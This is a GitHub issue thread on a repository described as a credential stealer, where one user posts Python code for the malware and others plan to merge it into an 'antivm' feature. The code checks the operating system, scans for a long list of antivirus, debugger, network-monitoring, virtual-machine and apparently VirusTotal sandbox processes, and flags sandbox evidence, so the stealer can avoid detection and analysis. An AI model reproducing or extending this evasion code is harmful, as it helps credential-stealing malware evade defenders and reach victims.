0xRose / Rose-Stealer_old

OUTDATED | Professional & efficient credential stealer written in python.
MIT License

Just some extras #137

Closed MalwareMakers closed 11 months ago

MalwareMakers commented 11 months ago
def {self.error_name}(self): 
        try: 
            import key
        except ImportError as e:
            print(f"No module: {{str(e)}}")

    def {self.check_os_name}(self): 
        os_name = platform.system()
        if os_name != 'Windows':
            return "danger"
        return "safe"

    def {self.pid_hunt_name}(self):
        def check_process(process_name):
            for process in psutil.process_iter(attrs=['name']):
                if process.info['name'] == process_name:
                    return True
            return False

        processes_to_check = [
            {{'pid': 1616, 'name': 'sysmon.exe'}},
            {{'pid': 2400, 'name': 'frida-winjector-helper-32.exe'}},
            {{'pid': 2464, 'name': 'frida-winjector-helper-64.exe'}},
            {{'pid': 1272, 'name': 'wspsvc.exe'}},
            {{'pid': 664, 'name': 'stigthymwmxu.exe'}},
            {{'pid': 2772, 'name': 'drjzmo.exe'}},
            {{'pid': 1904, 'name': 'avp.exe'}},
            {{'pid': 4000, 'name': 'avpui.exe'}},
            {{'pid': 4188, 'name': 'jhoslg.exe'}},
            {{'name': 'procmon.exe'}},
            {{'name': 'Vsserv.exe'}},
            {{'name': 'Postman.exe'}},
            {{'name': 'ollydbg.exe'}},
            {{'name': 'ProcessHacker.exe'}},
            {{'name': 'tcpview.exe'}},
            {{'name': 'regmon.exe'}},
            {{'name': 'procep.exe'}},
            {{'name': 'idaq.exe'}},
            {{'name': 'idaq64.exe'}},
            {{'name': 'ImmunityDebugger.exe'}},
            {{'name': 'Wireshark.exe'}},
            {{'name': 'dumpcap.exe'}},
            {'name': 'HookExplorer.exe'},
            {{'name': 'ImportREC.exe'}},
            {{'name': 'PETools.exe'}},
            {{'name': 'LordPE.exe'}},
            {{'name': 'SysInspector.exe'}}, 
            {{'name': 'proc_analyzer.exe'}},
            {{'name': 'sysAnalyzer.exe'}},
            {{'name': 'sniff_hit.exe'}},
            {{'name': 'windbg.exe'}},
            {{'name': 'joeboxcontrol.exe'}},
            {{'name': 'joeboxserver.exe'}},
            {{'name': 'ResourceHacker.exe'}},
            {'name': 'x32dbg.exe'},
            {{'name': 'x64dbg.exe'}},
            {{'name': 'Fiddler.exe'}},
            {{'name': 'httpdebugger.exe'}},
            {{'name': 'Sysmon64.exe'}},
            {{'name': 'nioswk.exe'}},
            {{'name': 'EDhVfFCHsBIIflrGw.exe'}},
            {{'name': 'lujazdkmiseqp.exe'}},
            {{'name': 'VmRemoteGuest.exe'}},
            {{'name': 'VirtualBoxVM.exe'}},
            {{'name': 'VBoxSVC.exe'}},
        ]
        for process_info in processes_to_check:
            process_name = process_info['name']

            if check_process(process_name):
                return "danger"   
        return "safe"

    def{self.Sandbox_name}(self):
        EvidenceOfSandbox = []
        sandboxProcesses = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"
        _, runningProcesses = win32pdh.EnumObjectItems(None,None,'process', win32pdh.PERF_DETAIL_WIZARD)
        for process in runningProcesses:
            for sandboxProcess in sandboxProcesses:
                if sandboxProcess in str(process):
                    if process not in EvidenceOfSandbox:
                        EvidenceOfSandbox.append(process)
                        break
        return EvidenceOfSandbox
Antsbatscats commented 11 months ago

the weird names are processes from within vt right?

MalwareMakers commented 11 months ago

the weird names are processes from within vt yea they are

gumbobrot commented 11 months ago

im already working on a special antivm that includes this, but still thanks, i'll see if i can implement it

MalwareMakers commented 11 months ago

im already working on a special antivm that includes this, but still thanks, i'll see if i can implement it

ye alr, im currently developing my own system want to work together?.

gumbobrot commented 11 months ago

send link or dm me on discord .gumbobrot#0

MalwareMakers commented 11 months ago

sent req